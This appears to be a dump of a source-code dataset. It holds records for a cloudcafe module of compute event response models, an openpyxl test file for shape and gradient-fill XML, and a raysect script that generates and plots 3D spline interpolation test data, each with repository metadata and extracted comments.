_executor.compile(net, input_) | en | 0.847984 | # Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. | 1.957826 | 2 |
cloudcafe/compute/events/models/common.py | rcbops-qa/cloudcafe | 0 | 8541 | <reponame>rcbops-qa/cloudcafe
"""
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cloudcafe.compute.events.models.base import (
EventBaseModel, EventBaseListModel)
class Bandwidth(EventBaseModel):
"""Bandwidth Response Model
@summary: Response model for bandwidth from a compute
event notification
@note: Although the 'public' and 'private' interfaces are
not required, they are the most common names, and are
included as optional attributes for the sake of convenience
@note: This type may contain additional unspecified
BandwidthInterface fields, which will be captured in a
dictionary called kwargs
JSON Example:
{
"private": { <BandwidthInterface> },
"public": { <BandwidthInterface> }
}
"""
kwarg_map = {'private': 'private',
'public': 'public'}
optional_kwargs = ['private', 'public']
strict_checking = False
def __init__(self, private=None, public=None, **kwargs):
super(Bandwidth, self).__init__(locals())
@classmethod
def _dict_to_obj(cls, json_dict):
"""Override dict_to_obj implementation"""
obj = cls._map_values_to_kwargs(json_dict)
for key in obj.kwargs:
obj.kwargs[key] = BandwidthInterface._dict_to_obj(obj.kwargs[key])
if obj.private:
obj.private = BandwidthInterface._dict_to_obj(obj.private)
if obj.public:
obj.public = BandwidthInterface._dict_to_obj(obj.public)
return obj
class BandwidthInterface(EventBaseModel):
"""Bandwidth Interface Response Model
@summary: Response model for bandwidth on an interface from
a compute event notification
@note: Sub-model of Bandwidth
JSON Example:
{
"bw_in": 123456,
"bw_out": 654321
}
"""
kwarg_map = {'bw_in': 'bw_in',
'bw_out': 'bw_out'}
def __init__(self, bw_in, bw_out):
super(BandwidthInterface, self).__init__(locals())
class FixedIp(EventBaseModel):
"""Fixed IP Response Model
@summary: Response model for a fixed IP address from a
compute event notification
@note: Represents a single fixed IP
JSON Example:
{
"address": "10.10.0.0",
"floating_ips": [],
"label": "public",
"meta": {},
"type": "fixed",
"version": 4,
"vif_mac": "FE:ED:FA:00:1C:D4"
}
"""
kwarg_map = {
'address': 'address',
'floating_ips': 'floating_ips',
'label': 'label',
'meta': 'meta',
'type_': 'type',
'version': 'version',
'vif_mac': 'vif_mac'}
def __init__(self, address, floating_ips, label, meta, type_, version,
vif_mac):
super(FixedIp, self).__init__(locals())
class FixedIps(EventBaseListModel):
"""Fixed IPs Model
@summary: Response model for a list of fixed IP addresses
from a compute event notification
@note: Returns a list of elements of type 'FixedIp'
JSON Example:
{
"fixed_ips": [
{ <FixedIp> },
{ <FixedIp> }
]
}
"""
list_model_key = 'fixed_ips'
ObjectModel = FixedIp
class ImageMeta(EventBaseModel):
"""Image Metadata Model
@summary: Response model for image metadata from a compute
event notification
@note: This type may contain additional unspecified
fields, which will be captured in a dictionary called kwargs
JSON Example:
{
"image_meta": {
"auto_disk_config": "disabled",
"base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"container_format": "ovf",
"disk_format": "vhd",
"image_type": "base",
"min_disk": "20",
"min_ram": "512",
"org.openstack__1__architecture": "x64",
"org.openstack__1__os_distro": "com.ubuntu",
"org.openstack__1__os_version": "12.04",
"os_type": "linux"
}
}
"""
kwarg_map = {
'auto_disk_config': 'auto_disk_config',
'base_image_ref': 'base_image_ref',
'container_format': 'container_format',
'disk_format': 'disk_format',
'image_type': 'image_type',
'min_disk': 'min_disk',
'min_ram': 'min_ram',
'org_openstack__1__architecture': 'org.openstack__1__architecture',
'org_openstack__1__os_distro': 'org.openstack__1__os_distro',
'org_openstack__1__os_version': 'org.openstack__1__os_version',
'os_type': 'os_type'}
strict_checking = False
def __init__(self, auto_disk_config, base_image_ref, container_format,
disk_format, image_type, min_disk, min_ram,
org_openstack__1__architecture, org_openstack__1__os_distro,
org_openstack__1__os_version, os_type, **kwargs):
super(ImageMeta, self).__init__(locals())
class InstanceException(EventBaseModel):
"""Instance Exception Model
@summary: Response model for an instance exception from a
compute event notification
@note: Represents a single instance exception
JSON Example:
{
"exception": {
"kwargs": {
"instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"reason": "Something broke",
"code": 500
}
}
}
"""
kwarg_map = {'kwargs': 'kwargs'}
def __init__(self, kwargs):
super(InstanceException, self).__init__(locals())
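# Added sketch (not part of the original module, names illustrative): payloads
# shaped like the JSON examples above are typically deserialised through the
# EventBaseModel helpers, along the lines of
#   ip = FixedIp._dict_to_obj({"address": "10.10.0.0", "floating_ips": [],
#                              "label": "public", "meta": {}, "type": "fixed",
#                              "version": 4, "vif_mac": "FE:ED:FA:00:1C:D4"})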
super(InstanceException, self).__init__(locals()) | en | 0.728559 | Copyright 2015 Rackspace Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Bandwidth Response Model @summary: Response model for bandwidth from a compute event notification @note: Although the 'public' and 'private' interfaces are not required, they are the most common names, and are included as optional attributes for the sake of convenience @note: This type may contain additional unspecified BandwidthInterface fields, which will be captured in a dictionary called kwargs JSON Example: { "private": { <BandwidthInterface> }, "public": { <BandwidthInterface> } } Override dict_to_obj implementation Bandwidth Interface Response Model @summary: Response model for bandwidth on an interface from a compute event notification @note: Sub-model of Bandwidth JSON Example: { "bw_in": 123456, "bw_out": 654321 } Fixed IP Response Model @summary: Response model for a fixed IP address from a compute event notification @note: Represents a single fixed IP JSON Example: { "address": "10.10.0.0", "floating_ips": [], "label": "public", "meta": {}, "type": "fixed", "version": 4, "vif_mac": "FE:ED:FA:00:1C:D4" } Fixed IPs Model @summary: Response model for a list of fixed IP addresses from a compute event notification @note: Returns a list of elements of type 'FixedIp' JSON Example: { "fixed_ips": [ { <FixedIp> }, { <FixedIp> } ] } Image Metadata Model @summary: Response model for image metadata from a compute event notification @note: This type may contain additional unspecified fields, which will be captured in a dictionary called kwargs JSON Example: { "image_meta": { "auto_disk_config": "disabled", "base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1", "container_format": "ovf", "disk_format": "vhd", "image_type": "base", "min_disk": "20", "min_ram": "512", "org.openstack__1__architecture": "x64", "org.openstack__1__os_distro": "com.ubuntu", "org.openstack__1__os_version": "12.04", "os_type": "linux" } } Instance Exception Model @summary: Response model for an instance exception from a compute event notification @note: Represents a single instance exception JSON Example: { "exception": { "kwargs": { "instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1", "reason": "Something broke", "code": 500 } } } | 1.988386 | 2 |
openpyxl/drawing/tests/test_shapes.py | sekcheong/openpyxl | 0 | 8542 | from __future__ import absolute_import
# Copyright (c) 2010-2017 openpyxl
import pytest
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def GradientFillProperties():
from ..fill import GradientFillProperties
return GradientFillProperties
class TestGradientFillProperties:
def test_ctor(self, GradientFillProperties):
fill = GradientFillProperties()
xml = tostring(fill.to_tree())
expected = """
<gradFill></gradFill>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GradientFillProperties):
src = """
<gradFill></gradFill>
"""
node = fromstring(src)
fill = GradientFillProperties.from_tree(node)
assert fill == GradientFillProperties()
@pytest.fixture
def Transform2D():
from ..shapes import Transform2D
return Transform2D
class TestTransform2D:
def test_ctor(self, Transform2D):
shapes = Transform2D()
xml = tostring(shapes.to_tree())
expected = """
<xfrm></xfrm>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Transform2D):
src = """
<root />
"""
node = fromstring(src)
shapes = Transform2D.from_tree(node)
assert shapes == Transform2D()
| from __future__ import absolute_import
# Copyright (c) 2010-2017 openpyxl
import pytest
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def GradientFillProperties():
from ..fill import GradientFillProperties
return GradientFillProperties
class TestGradientFillProperties:
def test_ctor(self, GradientFillProperties):
fill = GradientFillProperties()
xml = tostring(fill.to_tree())
expected = """
<gradFill></gradFill>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GradientFillProperties):
src = """
<gradFill></gradFill>
"""
node = fromstring(src)
fill = GradientFillProperties.from_tree(node)
assert fill == GradientFillProperties()
@pytest.fixture
def Transform2D():
from ..shapes import Transform2D
return Transform2D
class TestTransform2D:
def test_ctor(self, Transform2D):
shapes = Transform2D()
xml = tostring(shapes.to_tree())
expected = """
<xfrm></xfrm>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Transform2D):
src = """
<root />
"""
node = fromstring(src)
shapes = Transform2D.from_tree(node)
assert shapes == Transform2D()
| en | 0.189038 | # Copyright (c) 2010-2017 openpyxl <gradFill></gradFill> <gradFill></gradFill> <xfrm></xfrm> <root /> | 2.387977 | 2 |
raysect/core/math/function/float/function3d/interpolate/tests/scripts/generate_3d_splines.py | raysect/source | 71 | 8543 | <filename>raysect/core/math/function/float/function3d/interpolate/tests/scripts/generate_3d_splines.py
# Copyright (c) 2014-2021, Dr <NAME>, Raysect Project
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Raysect Project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
from matplotlib.colors import SymLogNorm, Normalize
import scipy
import sys
from raysect.core.math.function.float.function3d.interpolate.tests.data.interpolator3d_test_data import \
TestInterpolatorLoadBigValues, TestInterpolatorLoadNormalValues, TestInterpolatorLoadSmallValues,\
TestInterpolatorLoadBigValuesUneven, TestInterpolatorLoadNormalValuesUneven, TestInterpolatorLoadSmallValuesUneven
from raysect.core.math.function.float.function3d.interpolate.tests.test_interpolator_3d import X_LOWER, X_UPPER,\
NB_XSAMPLES, NB_X, X_EXTRAP_DELTA_MAX, PRECISION, Y_LOWER, Y_UPPER, NB_YSAMPLES, NB_Y, \
Y_EXTRAP_DELTA_MAX, EXTRAPOLATION_RANGE, large_extrapolation_range, Z_LOWER, Z_UPPER, \
NB_ZSAMPLES, NB_Z, Z_EXTRAP_DELTA_MAX, N_EXTRAPOLATION, uneven_linspace
# Force scientific format to get the right number of significant figures
np.set_printoptions(30000, linewidth=100, formatter={'float': lambda x_str: format(x_str, '.'+str(PRECISION)+'E')},
threshold=sys.maxsize)
# Overwrite imported values here.
VISUAL_NOT_TESTS = False
if VISUAL_NOT_TESTS:
NB_X = 51
NB_Y = 51
NB_Z = 51
NB_XSAMPLES = 101
NB_YSAMPLES = 101
NB_ZSAMPLES = 101
X_EXTRAP_DELTA_MIN = 0.04
Y_EXTRAP_DELTA_MIN = 0.04
Z_EXTRAP_DELTA_MIN = 0.04
BIG_VALUE_FACTOR = 20.
SMALL_VALUE_FACTOR = -20.
def docstring_test():
"""
.. code-block:: python
>>> from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
>>>
>>> x = np.linspace(-1., 1., 20)
>>> y = np.linspace(-1., 1., 20)
>>> z = np.linspace(-1., 1., 20)
>>> x_array, y_array, z_array = np.meshgrid(x, y, z, indexing='ij')
>>> f = np.exp(-(x_array**2 + y_array**2 + z_array**2))
>>> interpolator3D = Interpolator3DArray(x, y, z, f, 'cubic', 'nearest', 1.0, 1.0, 1.0)
>>> # Interpolation
>>> interpolator3D(1.0, 1.0, 0.2)
0.1300281183136766
>>> # Extrapolation
>>> interpolator3D(1.0, 1.0, 1.1)
0.0497870683678659
>>> # Extrapolation out of bounds
>>> interpolator3D(1.0, 1.0, 2.1)
ValueError: The specified value (z=2.1) is outside of extrapolation range.
"""
pass
def get_extrapolation_input_values(
x_lower, x_upper, y_lower, y_upper, z_lower, z_upper, x_extrap_delta_max, y_extrap_delta_max,
z_extrap_delta_max, x_extrap_delta_min, y_extrap_delta_min, z_extrap_delta_min):
xsamples_extrap_out_of_bounds_options = np.array(
[x_lower - x_extrap_delta_max, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_max])
ysamples_extrap_out_of_bounds_options = np.array(
[y_lower - y_extrap_delta_max, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_max])
zsamples_extrap_out_of_bounds_options = np.array(
[z_lower - z_extrap_delta_max, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_max])
xsamples_extrap_in_bounds_options = np.array(
[x_lower - x_extrap_delta_min, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_min])
ysamples_extrap_in_bounds_options = np.array(
[y_lower - y_extrap_delta_min, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_min])
zsamples_extrap_in_bounds_options = np.array(
[z_lower - z_extrap_delta_min, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_min])
xsamples_extrap_out_of_bounds = []
ysamples_extrap_out_of_bounds = []
zsamples_extrap_out_of_bounds = []
xsamples_extrap_in_bounds = []
ysamples_extrap_in_bounds = []
zsamples_extrap_in_bounds = []
edge_indicies_x = [0, len(xsamples_extrap_out_of_bounds_options) - 1]
edge_indicies_y = [0, len(ysamples_extrap_out_of_bounds_options) - 1]
edge_indicies_z = [0, len(zsamples_extrap_out_of_bounds_options) - 1]
for i_x in range(len(xsamples_extrap_out_of_bounds_options)):
for j_y in range(len(ysamples_extrap_out_of_bounds_options)):
for k_z in range(len(zsamples_extrap_out_of_bounds_options)):
if not (i_x not in edge_indicies_x and j_y not in edge_indicies_y and k_z not in edge_indicies_z):
xsamples_extrap_out_of_bounds.append(xsamples_extrap_out_of_bounds_options[i_x])
ysamples_extrap_out_of_bounds.append(ysamples_extrap_out_of_bounds_options[j_y])
zsamples_extrap_out_of_bounds.append(zsamples_extrap_out_of_bounds_options[k_z])
xsamples_extrap_in_bounds.append(xsamples_extrap_in_bounds_options[i_x])
ysamples_extrap_in_bounds.append(ysamples_extrap_in_bounds_options[j_y])
zsamples_extrap_in_bounds.append(zsamples_extrap_in_bounds_options[k_z])
return \
np.array(xsamples_extrap_out_of_bounds), np.array(ysamples_extrap_out_of_bounds), \
np.array(zsamples_extrap_out_of_bounds), np.array(xsamples_extrap_in_bounds), \
np.array(ysamples_extrap_in_bounds), np.array(zsamples_extrap_in_bounds)
def pcolourmesh_corners(input_array):
return np.concatenate((input_array[:-1] - np.diff(input_array)/2.,
np.array([input_array[-1] - (input_array[-1] - input_array[-2]) / 2.,
input_array[-1] + (input_array[-1] - input_array[-2]) / 2.])), axis=0)
def function_to_spline(x_input, y_input, z_input, factor_in):
t = np.pi * np.sqrt((x_input ** 2 + y_input ** 2 + z_input ** 2))
return factor_in*np.sinc(t)
if __name__ == '__main__':
# Calculate for big values, small values, or normal values
big_values = False
small_values = True
log_scale = False
uneven_spacing = False
use_saved_datastore_spline_knots = True
verbose_options = [False, True, False, False]
if VISUAL_NOT_TESTS:
index_x_in = 40
else:
index_x_in = 4
index_y_in = 0
index_z_in = 0
index_y_plot = 0
index_z_plot = 0
print('Using scipy version', scipy.__version__)
# Find the function values to be used
if big_values:
factor = np.power(10., BIG_VALUE_FACTOR)
elif small_values:
factor = np.power(10., SMALL_VALUE_FACTOR)
else:
factor = 1.
if uneven_spacing:
x_in = uneven_linspace(X_LOWER, X_UPPER, NB_X, offset_fraction=1./3.)
y_in = uneven_linspace(Y_LOWER, Y_UPPER, NB_Y, offset_fraction=1./3.)
z_in = uneven_linspace(Z_LOWER, Z_UPPER, NB_Z, offset_fraction=1./3.)
else:
x_in = np.linspace(X_LOWER, X_UPPER, NB_X)
y_in = np.linspace(Y_LOWER, Y_UPPER, NB_Y)
z_in = np.linspace(Z_LOWER, Z_UPPER, NB_Z)
x_in_full, y_in_full, z_in_full = np.meshgrid(x_in, y_in, z_in, indexing='ij')
f_in = function_to_spline(x_in_full, y_in_full, z_in_full, factor)
if use_saved_datastore_spline_knots:
if uneven_spacing:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValuesUneven()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValuesUneven()
else:
reference_loaded_values = TestInterpolatorLoadNormalValuesUneven()
else:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValues()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValues()
else:
reference_loaded_values = TestInterpolatorLoadNormalValues()
f_in = reference_loaded_values.data
if verbose_options[0]:
print('Save this to self.data in test_interpolator:\n', repr(f_in))
xsamples = np.linspace(X_LOWER, X_UPPER, NB_XSAMPLES)
ysamples = np.linspace(Y_LOWER, Y_UPPER, NB_YSAMPLES)
zsamples = np.linspace(Z_LOWER, Z_UPPER, NB_ZSAMPLES)
xsamples_extrapolation, ysamples_extrapolation, zsamples_extrapolation = large_extrapolation_range(
xsamples, ysamples, zsamples, EXTRAPOLATION_RANGE, N_EXTRAPOLATION
)
# # Extrapolation x and y values
xsamples_out_of_bounds, ysamples_out_of_bounds, zsamples_out_of_bounds, xsamples_in_bounds, ysamples_in_bounds, \
zsamples_in_bounds = get_extrapolation_input_values(
X_LOWER, X_UPPER, Y_LOWER, Y_UPPER, Z_LOWER, Z_UPPER, X_EXTRAP_DELTA_MAX, Y_EXTRAP_DELTA_MAX,
Z_EXTRAP_DELTA_MAX, X_EXTRAP_DELTA_MIN, Y_EXTRAP_DELTA_MIN, Z_EXTRAP_DELTA_MIN
)
interpolator3D = Interpolator3DArray(x_in, y_in, z_in, f_in, 'linear', 'linear', extrapolation_range_x=2.0,
extrapolation_range_y=2.0, extrapolation_range_z=2.0)
if VISUAL_NOT_TESTS:
n_lower_upper_interp = 51
else:
n_lower_upper_interp = 19
n_lower = 50
lower_p = 0.9
xsamples_lower_and_upper = np.linspace(X_LOWER, X_UPPER, n_lower_upper_interp)
ysamples_lower_and_upper = np.linspace(Y_LOWER, Y_UPPER, n_lower_upper_interp)
zsamples_lower_and_upper = np.linspace(Z_LOWER, Z_UPPER, n_lower_upper_interp)
xsamples_lower_and_upper = np.concatenate((np.linspace(X_LOWER - (X_UPPER - X_LOWER) * lower_p, X_LOWER, n_lower)[
:-1], xsamples_lower_and_upper,
np.linspace(X_UPPER, X_UPPER + (X_UPPER - X_LOWER) * lower_p, n_lower)[
1:]))
ysamples_lower_and_upper = np.concatenate((np.linspace(Y_LOWER - (Y_UPPER - Y_LOWER) * lower_p, Y_LOWER, n_lower)[
:-1], ysamples_lower_and_upper,
np.linspace(Y_UPPER, Y_UPPER + (Y_UPPER - Y_LOWER) * lower_p, n_lower)[
1:]))
zsamples_lower_and_upper = np.concatenate((np.linspace(Z_LOWER - (Z_UPPER - Z_LOWER) * lower_p, Z_LOWER, n_lower)[
:-1], zsamples_lower_and_upper,
np.linspace(Z_UPPER, Z_UPPER + (Z_UPPER - Z_LOWER) * lower_p, n_lower)[
1:]))
index_ysamples_lower_upper = np.where(x_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# extrapolation to save
f_extrapolation_output = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_extrapolation_output[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[1]:
print('Output of extrapolation to be saved:\n', repr(f_extrapolation_output))
check_plot = True
if check_plot:
import matplotlib.pyplot as plt
from matplotlib import cm
# Install mayavi and pyQt5
main_plots_on = True
if main_plots_on:
fig, ax = plt.subplots(1, 4)
fig1, ax1 = plt.subplots(1, 2)
if not (x_in[index_x_in] == xsamples).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
if not (y_in[index_y_in] == ysamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
index_xsamples = np.where(x_in[index_x_in] == xsamples)[0].item()
index_ysamples_lower_upper = np.where(y_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# index_ysamples_lower_upper = 0
# index_zsamples_lower_upper = 0
index_zsamples_lower_upper = np.where(z_in[index_z_in] == zsamples_lower_and_upper)[0].item()
f_plot_x = f_in[index_x_in, :, :]
y_corners_x = pcolourmesh_corners(y_in)
z_corners_x = pcolourmesh_corners(z_in)
min_colourmap = np.min(f_in)
max_colourmap = np.max(f_in)
if log_scale:
c_norm = SymLogNorm(vmin=min_colourmap, vmax=max_colourmap, linthresh=0.03)
else:
c_norm = Normalize(vmin=min_colourmap, vmax=max_colourmap)
colourmap = cm.get_cmap('viridis', 512)
ax[0].pcolormesh(y_corners_x, z_corners_x, f_plot_x, norm=c_norm, cmap='viridis')
# ax[0].pcolormesh(y_in, z_in, f_plot_x)
ax[0].set_aspect('equal')
f_out = np.zeros((len(xsamples), len(ysamples), len(zsamples)))
for i in range(len(xsamples)):
for j in range(len(ysamples)):
for k in range(len(zsamples)):
f_out[i, j, k] = interpolator3D(xsamples[i], ysamples[j], zsamples[k])
if verbose_options[2]:
print('Test interpolation:\n', repr(f_out))
f_out_lower_and_upper = np.zeros((len(xsamples_lower_and_upper), len(ysamples_lower_and_upper),
len(zsamples_lower_and_upper)))
for i in range(len(xsamples_lower_and_upper)):
for j in range(len(ysamples_lower_and_upper)):
for k in range(len(zsamples_lower_and_upper)):
f_out_lower_and_upper[i, j, k] = interpolator3D(
xsamples_lower_and_upper[i], ysamples_lower_and_upper[j], zsamples_lower_and_upper[k]
)
f_out_extrapolation = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_out_extrapolation[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[3]:
print('New output of extrapolation to be saved:\n', repr(f_out_extrapolation))
index_xsamples_extrap = np.where(x_in[index_x_in] == xsamples_extrapolation)
f_out_x_extrapolation = f_out_extrapolation[index_xsamples_extrap]
im = ax[3].scatter(
ysamples_extrapolation[index_xsamples_extrap], zsamples_extrapolation[index_xsamples_extrap],
c=f_out_x_extrapolation, norm=c_norm, cmap='viridis', s=10
)
ax[3].set_aspect('equal')
f_out_x = f_out[index_xsamples, :, :]
ysamples_mesh, zsamples_mesh = np.meshgrid(ysamples, zsamples)
ax[0].scatter(
ysamples_mesh.ravel(), zsamples_mesh.ravel(), c=f_out_x.ravel(), norm=c_norm, cmap='viridis', s=10
)
index_y_print = -1
index_z_print = 0
index_ysamples_print = np.where(y_in[index_y_print] == ysamples)[0].item()
index_zsamples_print = np.where(z_in[index_z_print] == zsamples)[0].item()
ax[0].set_title('Slice of x', size=20)
ax[1].set_title(f'Interpolated points \nin slice of x={x_in[index_x_in]}', size=20)
y_corners_xsamples = pcolourmesh_corners(ysamples)
z_corners_xsamples = pcolourmesh_corners(zsamples)
im2 = ax[1].pcolormesh(y_corners_xsamples, z_corners_xsamples, f_out_x, norm=c_norm, cmap='viridis')
ax[1].set_aspect('equal')
if not (x_in[index_x_in] == xsamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, n_lower_upper={n_lower}-1, must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1,'
f' NB_Z={NB_Z}-1'
)
index_xsamples_lower_and_upper = np.where(x_in[index_x_in] == xsamples_lower_and_upper)[0].item()
y_corners_xsamples_lower_and_upper = pcolourmesh_corners(ysamples_lower_and_upper)
z_corners_xsamples_lower_and_upper = pcolourmesh_corners(zsamples_lower_and_upper)
f_out_lower_and_upper_x = f_out_lower_and_upper[index_xsamples_lower_and_upper, :, :]
im3 = ax[2].pcolormesh(
y_corners_xsamples_lower_and_upper, z_corners_xsamples_lower_and_upper, f_out_lower_and_upper_x,
norm=c_norm, cmap='viridis'
)
check_array_z = np.zeros(len(zsamples_lower_and_upper))
check_array_y = np.zeros(len(ysamples_lower_and_upper))
for i in range(len(zsamples_lower_and_upper)):
check_array_z[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[index_ysamples_lower_upper], zsamples_lower_and_upper[i]
)
check_array_y[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[i], zsamples_lower_and_upper[index_zsamples_lower_upper]
)
ax1[0].plot(zsamples_lower_and_upper, f_out_lower_and_upper_x[index_ysamples_lower_upper, :])
ax1[0].plot(z_in, f_in[index_x_in, index_y_in, :], 'bo')
ax1[0].plot(zsamples_lower_and_upper, check_array_z, 'gx')
ax1[1].plot(ysamples_lower_and_upper, check_array_y)
# ax1[1].plot(ysamples_lower_and_upper, f_out_lower_and_upper_x[:, index_z_plot])
ax1[0].axvline(z_in[0], color='r', linestyle='--')
ax1[0].axvline(z_in[-1], color='r', linestyle='--')
ax1[1].axvline(y_in[0], color='r', linestyle='--')
ax1[1].axvline(y_in[-1], color='r', linestyle='--')
fig.colorbar(im, ax=ax[0])
fig.colorbar(im2, ax=ax[1])
fig.colorbar(im3, ax=ax[2])
ax[2].set_aspect('equal')
plt.show()
| <filename>raysect/core/math/function/float/function3d/interpolate/tests/scripts/generate_3d_splines.py
# Copyright (c) 2014-2021, Dr <NAME>, Raysect Project
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Raysect Project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
from matplotlib.colors import SymLogNorm, Normalize
import scipy
import sys
from raysect.core.math.function.float.function3d.interpolate.tests.data.interpolator3d_test_data import \
TestInterpolatorLoadBigValues, TestInterpolatorLoadNormalValues, TestInterpolatorLoadSmallValues,\
TestInterpolatorLoadBigValuesUneven, TestInterpolatorLoadNormalValuesUneven, TestInterpolatorLoadSmallValuesUneven
from raysect.core.math.function.float.function3d.interpolate.tests.test_interpolator_3d import X_LOWER, X_UPPER,\
NB_XSAMPLES, NB_X, X_EXTRAP_DELTA_MAX, PRECISION, Y_LOWER, Y_UPPER, NB_YSAMPLES, NB_Y, \
